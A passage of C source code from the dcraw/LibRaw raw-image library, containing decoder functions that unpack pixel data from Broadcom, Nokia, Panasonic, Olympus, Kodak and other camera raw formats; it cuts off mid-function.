if (load_flags & 1) bwide = bwide * 16 / 15;
bite = 8 + (load_flags & 24);
half = (raw_height+1) >> 1;
for (irow=0; irow < raw_height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
row = irow;
if (load_flags & 2 &&
(row = irow % half * 2 + irow / half) == 1 &&
load_flags & 4) {
if (vbits=0, tiff_compress)
fseek (ifp, data_offset - (-half*bwide & -2048), SEEK_SET);
else {
fseek (ifp, 0, SEEK_END);
fseek (ifp, ftell(ifp) >> 3 << 2, SEEK_SET);
}
}
if(feof(ifp)) throw LIBRAW_EXCEPTION_IO_EOF;
for (col=0; col < raw_width; col++) {
for (vbits -= tiff_bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
val = bitbuf << (64-tiff_bps-vbits) >> (64-tiff_bps);
RAW(row,col ^ (load_flags >> 6 & 1)) = val;
if (load_flags & 1 && (col % 10) == 9 && fgetc(ifp) &&
row < height+top_margin && col < width+left_margin) derror();
}
vbits -= rbits;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
ushort raw_stride;
void CLASS parse_broadcom () {
/* This structure is at offset 0xb0 from the 'BRCM' ident. */
struct {
uint8_t umode[32];
uint16_t uwidth;
uint16_t uheight;
uint16_t padding_right;
uint16_t padding_down;
uint32_t unknown_block[6];
uint16_t transform;
uint16_t format;
uint8_t bayer_order;
uint8_t bayer_format;
} header;
header.bayer_order = 0;
fseek (ifp, 0xb0 - 0x20, SEEK_CUR);
fread (&header, 1, sizeof(header), ifp);
raw_stride = ((((((header.uwidth + header.padding_right)*5)+3)>>2) + 0x1f)&(~0x1f));
raw_width = width = header.uwidth;
raw_height = height = header.uheight;
filters = 0x16161616; /* default Bayer order is 2, BGGR */
switch (header.bayer_order) {
case 0: /* RGGB */
filters = 0x94949494;
break;
case 1: /* GBRG */
filters = 0x49494949;
break;
case 3: /* GRBG */
filters = 0x61616161;
break;
}
}
void CLASS broadcom_load_raw() {
uchar *data, *dp;
int rev, row, col, c;
rev = 3 * (order == 0x4949);
data = (uchar *) malloc (raw_stride*2);
merror (data, "broadcom_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data+raw_stride, 1, raw_stride, ifp) < raw_stride) derror();
FORC(raw_stride) data[c] = data[raw_stride+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
#endif
void CLASS nokia_load_raw()
{
uchar *data, *dp;
int rev, dwide, row, col, c;
double sum[]={0,0};
rev = 3 * (order == 0x4949);
dwide = (raw_width * 5 + 1) / 4;
data = (uchar *) malloc (dwide*2);
merror (data, "nokia_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data+dwide, 1, dwide, ifp) < dwide) derror();
FORC(dwide) data[c] = data[dwide+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (data);
throw;
}
#endif
free (data);
maximum = 0x3ff;
if (strncmp(make,"OmniVision",10)) return;
row = raw_height/2;
FORC(width-1) {
sum[ c & 1] += SQR(RAW(row,c)-RAW(row+1,c+1));
sum[~c & 1] += SQR(RAW(row+1,c)-RAW(row,c+1));
}
if (sum[1] > sum[0]) filters = 0x4b4b4b4b;
}
void CLASS android_tight_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
bwide = -(-5*raw_width >> 5) << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_tight_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
void CLASS android_loose_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
UINT64 bitbuf=0;
bwide = (raw_width+5)/6 << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_loose_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=8, col+=6) {
FORC(8) bitbuf = (bitbuf << 8) | dp[c^7];
FORC(6) RAW(row,col+c) = (bitbuf >> c*10) & 0x3ff;
}
}
free (data);
}
void CLASS canon_rmf_load_raw()
{
int row, col, bits, orow, ocol, c;
#ifdef LIBRAW_LIBRARY_BUILD
int *words = (int*)malloc(sizeof(int)*(raw_width/3+1));
merror(words,"canon_rmf_load_raw");
#endif
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
fread(words,sizeof(int),raw_width/3,ifp);
for (col=0; col < raw_width-2; col+=3)
{
bits = words[col/3];
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0)
{
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#else
for (col=0; col < raw_width-2; col+=3) {
bits = get4();
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0) {
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(words);
#endif
maximum = curve[0x3ff];
}
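/*
Panasonic bit reader: fills a 0x4000-byte buffer (split at load_flags)
and extracts nbits at a time, tracking the read position in vbits.
*/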
unsigned CLASS pana_bits (int nbits)
{
#ifndef LIBRAW_NOTHREADS
#define buf tls->pana_bits.buf
#define vbits tls->pana_bits.vbits
#else
static uchar buf[0x4000];
static int vbits;
#endif
int byte;
if (!nbits) return vbits=0;
if (!vbits) {
fread (buf+load_flags, 1, 0x4000-load_flags, ifp);
fread (buf, 1, load_flags, ifp);
}
vbits = (vbits - nbits) & 0x1ffff;
byte = vbits >> 3 ^ 0x3ff0;
return (buf[byte] | buf[byte+1] << 8) >> (vbits & 7) & ~((~0u) << nbits);
#ifndef LIBRAW_NOTHREADS
#undef buf
#undef vbits
#endif
}
void CLASS panasonic_load_raw()
{
int row, col, i, j, sh=0, pred[2], nonz[2];
pana_bits(0);
for (row = 0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if ((i = col % 14) == 0)
pred[0] = pred[1] = nonz[0] = nonz[1] = 0;
if (i % 3 == 2) sh = 4 >> (3 - pana_bits(2));
if (nonz[i & 1]) {
if ((j = pana_bits(8))) {
if ((pred[i & 1] -= 0x80 << sh) < 0 || sh == 4)
pred[i & 1] &= ~((~0u) << sh);
pred[i & 1] += j << sh;
}
}
else if ((nonz[i & 1] = pana_bits(8)) || i > 11)
pred[i & 1] = nonz[i & 1] << 4 | pana_bits(4);
if ((RAW(row, col) = pred[col & 1]) > 4098 && col < width && row < height)
derror();
}
}
}
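/*
Olympus ORF: decodes a per-pixel difference from a sign bit, two low
bits and a Huffman-coded high part, then adds it to a predictor chosen
from the west, north and north-west neighbours.
*/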
void CLASS olympus_load_raw()
{
ushort huff[4096];
int row, col, nbits, sign, low, high, i, c, w, n, nw;
int acarry[2][3], *carry, pred, diff;
huff[n=0] = 0xc0c;
for (i=12; i--; )
FORC(2048 >> i) huff[++n] = (i+1) << 8 | i;
fseek (ifp, 7, SEEK_CUR);
getbits(-1);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (acarry, 0, sizeof acarry);
for (col=0; col < raw_width; col++) {
carry = acarry[col & 1];
i = 2 * (carry[2] < 3);
for (nbits=2+i; (ushort) carry[0] >> (nbits+i); nbits++);
low = (sign = getbits(3)) & 3;
sign = sign << 29 >> 31;
if ((high = getbithuff(12,huff)) == 12)
high = getbits(16-nbits) >> 1;
carry[0] = (high << nbits) | getbits(nbits);
diff = (carry[0] ^ sign) + carry[1];
carry[1] = (diff*3 + carry[1]) >> 5;
carry[2] = carry[0] > 16 ? 0 : carry[2]+1;
if (col >= width) continue;
if (row < 2 && col < 2) pred = 0;
else if (row < 2) pred = RAW(row,col-2);
else if (col < 2) pred = RAW(row-2,col);
else {
w = RAW(row,col-2);
n = RAW(row-2,col);
nw = RAW(row-2,col-2);
if ((w < nw && nw < n) || (n < nw && nw < w)) {
if (ABS(w-nw) > 32 || ABS(n-nw) > 32)
pred = w + n - nw;
else pred = (w + n) >> 1;
} else pred = ABS(w-nw) > ABS(n-nw) ? w : n;
}
if ((RAW(row,col) = pred + ((diff << 2) | low)) >> 12) derror();
}
}
}
void CLASS minolta_rd175_load_raw()
{
uchar pixel[768];
unsigned irow, box, row, col;
for (irow=0; irow < 1481; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 768, ifp) < 768) derror();
box = irow / 82;
row = irow % 82 * 12 + ((box < 12) ? box | 1 : (box-12)*2);
switch (irow) {
case 1477: case 1479: continue;
case 1476: row = 984; break;
case 1480: row = 985; break;
case 1478: row = 985; box = 1;
}
if ((box < 12) && (box & 1)) {
for (col=0; col < 1533; col++, row ^= 1)
if (col != 1) RAW(row,col) = (col+1) & 2 ?
pixel[col/2-1] + pixel[col/2+1] : pixel[col/2] << 1;
RAW(row,1) = pixel[1] << 1;
RAW(row,1533) = pixel[765] << 1;
} else
for (col=row & 1; col < 1534; col+=2)
RAW(row,col) = pixel[col/2] << 1;
}
maximum = 0xff << 1;
}
void CLASS quicktake_100_load_raw()
{
uchar pixel[484][644];
static const short gstep[16] =
{ -89,-60,-44,-32,-22,-15,-8,-2,2,8,15,22,32,44,60,89 };
static const short rstep[6][4] =
{ { -3,-1,1,3 }, { -5,-1,1,5 }, { -8,-2,2,8 },
{ -13,-3,3,13 }, { -19,-4,4,19 }, { -28,-6,6,28 } };
static const short t_curve[256] =
{ 0,1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,
54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,74,75,76,77,78,
79,80,81,82,83,84,86,88,90,92,94,97,99,101,103,105,107,110,112,114,116,
118,120,123,125,127,129,131,134,136,138,140,142,144,147,149,151,153,155,
158,160,162,164,166,168,171,173,175,177,179,181,184,186,188,190,192,195,
197,199,201,203,205,208,210,212,214,216,218,221,223,226,230,235,239,244,
248,252,257,261,265,270,274,278,283,287,291,296,300,305,309,313,318,322,
326,331,335,339,344,348,352,357,361,365,370,374,379,383,387,392,396,400,
405,409,413,418,422,426,431,435,440,444,448,453,457,461,466,470,474,479,
483,487,492,496,500,508,519,531,542,553,564,575,587,598,609,620,631,643,
654,665,676,687,698,710,721,732,743,754,766,777,788,799,810,822,833,844,
855,866,878,889,900,911,922,933,945,956,967,978,989,1001,1012,1023 };
int rb, row, col, sharp, val=0;
#ifdef LIBRAW_LIBRARY_BUILD
if(width>640 || height > 480)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
getbits(-1);
memset (pixel, 0x80, sizeof pixel);
for (row=2; row < height+2; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=2+(row & 1); col < width+2; col+=2) {
val = ((pixel[row-1][col-1] + 2*pixel[row-1][col+1] +
pixel[row][col-2]) >> 2) + gstep[getbits(4)];
pixel[row][col] = val = LIM(val,0,255);
if (col < 4)
pixel[row][col-2] = pixel[row+1][~row & 1] = val;
if (row == 2)
pixel[row-1][col+1] = pixel[row-1][col+3] = val;
}
pixel[row][col] = val;
}
for (rb=0; rb < 2; rb++)
for (row=2+rb; row < height+2; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
if (row < 4 || col < 4) sharp = 2;
else {
val = ABS(pixel[row-2][col] - pixel[row][col-2])
+ ABS(pixel[row-2][col] - pixel[row-2][col-2])
+ ABS(pixel[row][col-2] - pixel[row-2][col-2]);
sharp = val < 4 ? 0 : val < 8 ? 1 : val < 16 ? 2 :
val < 32 ? 3 : val < 48 ? 4 : 5;
}
val = ((pixel[row-2][col] + pixel[row][col-2]) >> 1)
+ rstep[sharp][getbits(2)];
pixel[row][col] = val = LIM(val,0,255);
if (row < 4) pixel[row-2][col+2] = val;
if (col < 4) pixel[row+2][col-2] = val;
}
}
for (row=2; row < height+2; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
val = ((pixel[row][col-1] + (pixel[row][col] << 2) +
pixel[row][col+1]) >> 1) - 0x100;
pixel[row][col] = LIM(val,0,255);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = t_curve[pixel[row+2][col+2]];
}
maximum = 0x3ff;
}
#define radc_token(tree) ((signed char) getbithuff(8,huff[tree]))
#define FORYX for (y=1; y < 3; y++) for (x=col+1; x >= col; x--)
#define PREDICTOR (c ? (buf[c][y-1][x] + buf[c][y][x+1]) / 2 \
: (buf[c][y-1][x+1] + 2*buf[c][y-1][x] + buf[c][y][x+1]) / 4)
#ifdef __GNUC__
# if __GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 8)
# pragma GCC optimize("no-aggressive-loop-optimizations")
# endif
#endif
void CLASS kodak_radc_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
// All Kodak RADC images are 768x512
if(width>768 || raw_width>768 || height > 512 || raw_height>512 )
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
static const signed char src[] = {
1,1, 2,3, 3,4, 4,2, 5,7, 6,5, 7,6, 7,8,
1,0, 2,1, 3,3, 4,4, 5,2, 6,7, 7,6, 8,5, 8,8,
2,1, 2,3, 3,0, 3,2, 3,4, 4,6, 5,5, 6,7, 6,8,
2,0, 2,1, 2,3, 3,2, 4,4, 5,6, 6,7, 7,5, 7,8,
2,1, 2,4, 3,0, 3,2, 3,3, 4,7, 5,5, 6,6, 6,8,
2,3, 3,1, 3,2, 3,4, 3,5, 3,6, 4,7, 5,0, 5,8,
2,3, 2,6, 3,0, 3,1, 4,4, 4,5, 4,7, 5,2, 5,8,
2,4, 2,7, 3,3, 3,6, 4,1, 4,2, 4,5, 5,0, 5,8,
2,6, 3,1, 3,3, 3,5, 3,7, 3,8, 4,0, 5,2, 5,4,
2,0, 2,1, 3,2, 3,3, 4,4, 4,5, 5,6, 5,7, 4,8,
1,0, 2,2, 2,-2,
1,-3, 1,3,
2,-17, 2,-5, 2,5, 2,17,
2,-7, 2,2, 2,9, 2,18,
2,-18, 2,-9, 2,-2, 2,7,
2,-28, 2,28, 3,-49, 3,-9, 3,9, 4,49, 5,-79, 5,79,
2,-1, 2,13, 2,26, 3,39, 4,-16, 5,55, 6,-37, 6,76,
2,-26, 2,-13, 2,1, 3,-39, 4,16, 5,-55, 6,-76, 6,37
};
ushort huff[19][256];
int row, col, tree, nreps, rep, step, i, c, s, r, x, y, val;
short last[3] = { 16,16,16 }, mul[3], buf[3][3][386];
static const ushort pt[] =
{ 0,0, 1280,1344, 2320,3616, 3328,8000, 4095,16383, 65535,16383 };
for (i=2; i < 12; i+=2)
for (c=pt[i-2]; c <= pt[i]; c++)
curve[c] = (float)
(c-pt[i-2]) / (pt[i]-pt[i-2]) * (pt[i+1]-pt[i-1]) + pt[i-1] + 0.5;
for (s=i=0; i < sizeof src; i+=2)
FORC(256 >> src[i])
((ushort *)huff)[s++] = src[i] << 8 | (uchar) src[i+1];
s = kodak_cbpp == 243 ? 2 : 3;
FORC(256) huff[18][c] = (8-s) << 8 | c >> s << s | 1 << (s-1);
getbits(-1);
for (i=0; i < sizeof(buf)/sizeof(short); i++)
((short *)buf)[i] = 2048;
for (row=0; row < height; row+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC3 mul[c] = getbits(6);
#ifdef LIBRAW_LIBRARY_BUILD
if(!mul[0] || !mul[1] || !mul[2])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
FORC3 {
val = ((0x1000000/last[c] + 0x7ff) >> 12) * mul[c];
s = val > 65564 ? 10:12;
x = ~((~0u) << (s-1));
val <<= 12-s;
for (i=0; i < sizeof(buf[0])/sizeof(short); i++)
((short *)buf[c])[i] = (((short *)buf[c])[i] * val + x) >> s;
last[c] = mul[c];
for (r=0; r <= !c; r++) {
buf[c][1][width/2] = buf[c][2][width/2] = mul[c] << 7;
for (tree=1, col=width/2; col > 0; ) {
if ((tree = radc_token(tree))) {
col -= 2;
if (tree == 8)
FORYX buf[c][y][x] = (uchar) radc_token(18) * mul[c];
else
FORYX buf[c][y][x] = radc_token(tree+10) * 16 + PREDICTOR;
} else
do {
nreps = (col > 2) ? radc_token(9) + 1 : 1;
for (rep=0; rep < 8 && rep < nreps && col > 0; rep++) {
col -= 2;
if(col>=0)
FORYX buf[c][y][x] = PREDICTOR;
if (rep & 1) {
step = radc_token(10) << 4;
FORYX buf[c][y][x] += step;
}
}
} while (nreps == 9);
}
for (y=0; y < 2; y++)
for (x=0; x < width/2; x++) {
val = (buf[c][y+1][x] << 4) / mul[c];
if (val < 0) val = 0;
if (c) RAW(row+y*2+c-1,x*2+2-c) = val;
else RAW(row+r*2+y,x*2+y) = val;
}
memcpy (buf[c][0]+!c, buf[c][2], sizeof buf[c][0]-2*!c);
}
}
for (y=row; y < row+4; y++)
for (x=0; x < width; x++)
if ((x+y) & 1) {
r = x ? x-1 : x+1;
s = x+1 < width ? x+1 : x-1;
val = (RAW(y,x)-2048)*2 + (RAW(y,r)+RAW(y,s))/2;
if (val < 0) val = 0;
RAW(y,x) = val;
}
}
for (i=0; i < height*width; i++)
raw_image[i] = curve[raw_image[i]];
maximum = 0x3fff;
}
#undef FORYX
#undef PREDICTOR
#ifdef NO_JPEG
void CLASS kodak_jpeg_load_raw() {}
void CLASS lossy_dng_load_raw() {}
#else
#ifndef LIBRAW_LIBRARY_BUILD
METHODDEF(boolean)
fill_input_buffer (j_decompress_ptr cinfo)
{
static uchar jpeg_buffer[4096];
size_t nbytes;
nbytes = fread (jpeg_buffer, 1, 4096, ifp);
swab (jpeg_buffer, jpeg_buffer, nbytes);
cinfo->src->next_input_byte = jpeg_buffer;
cinfo->src->bytes_in_buffer = nbytes;
return TRUE;
}
void CLASS kodak_jpeg_load_raw()
{
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
int row, col;
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
jpeg_stdio_src (&cinfo, ifp);
cinfo.src->fill_input_buffer = fill_input_buffer;
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 )) {
fprintf (stderr,_("%s: incorrect JPEG dimensions\n"), ifname);
jpeg_destroy_decompress (&cinfo);
longjmp (failure, 3);
}
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, width*3, 1);
while (cinfo.output_scanline < cinfo.output_height) {
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
maximum = 0xff << 1;
}
#else
struct jpegErrorManager {
struct jpeg_error_mgr pub;
};
static void jpegErrorExit (j_common_ptr cinfo)
{
jpegErrorManager* myerr = (jpegErrorManager*) cinfo->err;
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
// LibRaw's kodak_jpeg_load_raw: decodes from a memory buffer instead of stdio
void CLASS kodak_jpeg_load_raw()
{
if(data_size < 1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
int row, col;
jpegErrorManager jerr;
struct jpeg_decompress_struct cinfo;
cinfo.err = jpeg_std_error(&jerr.pub);
jerr.pub.error_exit = jpegErrorExit;
unsigned char *jpg_buf = (unsigned char *)malloc(data_size);
merror(jpg_buf,"kodak_jpeg_load_raw");
unsigned char *pixel_buf = (unsigned char*) malloc(width*3);
jpeg_create_decompress (&cinfo);
merror(pixel_buf,"kodak_jpeg_load_raw");
fread(jpg_buf,data_size,1,ifp);
swab ((char*)jpg_buf, (char*)jpg_buf, data_size);
try
{
jpeg_mem_src(&cinfo, jpg_buf, data_size);
int rc = jpeg_read_header(&cinfo, TRUE);
if(rc!=1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 ))
{
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
unsigned char *buf[1];
buf[0] = pixel_buf;
while (cinfo.output_scanline < cinfo.output_height)
{
checkCancel();
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
unsigned char (*pixel)[3] = (unsigned char (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
}
catch (...)
{
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
throw;
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
maximum = 0xff << 1;
}
#endif
#ifndef LIBRAW_LIBRARY_BUILD
void CLASS gamma_curve (double pwr, double ts, int mode, int imax);
#endif
void CLASS lossy_dng_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
unsigned sorder=order, ntags, opcode, deg, i, j, c;
unsigned save=data_offset-4, trow=0, tcol=0, row, col;
ushort cur[3][256];
double coeff[9], tot;
if (meta_offset) {
fseek (ifp, meta_offset, SEEK_SET);
order = 0x4d4d;
ntags = get4();
while (ntags--) {
opcode = get4(); get4(); get4();
if (opcode != 8)
{ fseek (ifp, get4(), SEEK_CUR); continue; }
fseek (ifp, 20, SEEK_CUR);
if ((c = get4()) > 2) break;
fseek (ifp, 12, SEEK_CUR);
if ((deg = get4()) > 8) break;
for (i=0; i <= deg && i < 9; i++)
coeff[i] = getreal(12);
for (i=0; i < 256; i++) {
for (tot=j=0; j <= deg; j++)
tot += coeff[j] * pow(i/255.0, (int)j);
cur[c][i] = tot*0xffff;
}
}
order = sorder;
} else {
gamma_curve (1/2.4, 12.92, 1, 255);
FORC3 memcpy (cur[c], curve, sizeof cur[0]);
}
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
while (trow < raw_height) {
fseek (ifp, save+=4, SEEK_SET);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
if(libraw_internal_data.internal_data.input->jpeg_src(&cinfo) == -1)
{
jpeg_destroy_decompress(&cinfo);
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
#else
jpeg_stdio_src (&cinfo, ifp);
#endif
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, cinfo.output_width*3, 1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (cinfo.output_scanline < cinfo.output_height &&
(row = trow + cinfo.output_scanline) < height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < cinfo.output_width && tcol+col < width; col++) {
FORC3 image[row*width+tcol+col][c] = cur[c][pixel[col][c]];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
jpeg_destroy_decompress (&cinfo);
throw;
}
#endif
jpeg_abort_decompress (&cinfo);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
}
jpeg_destroy_decompress (&cinfo);
maximum = 0xffff;
}
#endif
void CLASS kodak_dc120_load_raw()
{
static const int mul[4] = { 162, 192, 187, 92 };
static const int add[4] = { 0, 636, 424, 212 };
uchar pixel[848];
int row, shift, col;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 848, ifp) < 848) derror();
shift = row * mul[row & 3] + add[row & 3];
for (col=0; col < width; col++)
RAW(row,col) = (ushort) pixel[(col + shift) % 848];
}
maximum = 0xff;
}
void CLASS eight_bit_load_raw()
{
uchar *pixel;
unsigned row, col;
pixel = (uchar *) calloc (raw_width, sizeof *pixel);
merror (pixel, "eight_bit_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, raw_width, ifp) < raw_width) derror();
for (col=0; col < raw_width; col++)
RAW(row,col) = curve[pixel[col]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c330_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 2*sizeof *pixel);
merror (pixel, "kodak_c330_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, raw_width, 2, ifp) < 2) derror();
if (load_flags && (row & 31) == 31)
fseek (ifp, raw_width*32, SEEK_CUR);
for (col=0; col < width; col++) {
y = pixel[col*2];
cb = pixel[(col*2 & -4) | 1] - 128;
cr = pixel[(col*2 & -4) | 3] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c603_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 3*sizeof *pixel);
merror (pixel, "kodak_c603_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (~row & 1)
if (fread (pixel, raw_width, 3, ifp) < 3) derror();
for (col=0; col < width; col++) {
y = pixel[width*2*(row & 1) + col];
cb = pixel[width + (col & -2)] - 128;
cr = pixel[width + (col & -2)+1] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_262_load_raw()
{
static const uchar kodak_tree[2][26] =
{ { 0,1,5,1,1,2,0,0,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 },
{ 0,3,1,1,1,1,1,2,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 } };
ushort *huff[2];
uchar *pixel;
int *strip, ns, c, row, col, chess, pi=0, pi1, pi2, pred, val;
FORC(2) huff[c] = make_decoder (kodak_tree[c]);
ns = (raw_height+63) >> 5;
pixel = (uchar *) malloc (raw_width*32 + ns*4);
merror (pixel, "kodak_262_load_raw()");
strip = (int *) (pixel + raw_width*32);
order = 0x4d4d;
FORC(ns) strip[c] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if ((row & 31) == 0) {
fseek (ifp, strip[row >> 5], SEEK_SET);
getbits(-1);
pi = 0;
}
for (col=0; col < raw_width; col++) {
chess = (row + col) & 1;
pi1 = chess ? pi-2 : pi-raw_width-1;
pi2 = chess ? pi-2*raw_width : pi-raw_width+1;
if (col <= chess) pi1 = -1;
if (pi1 < 0) pi1 = pi2;
if (pi2 < 0) pi2 = pi1;
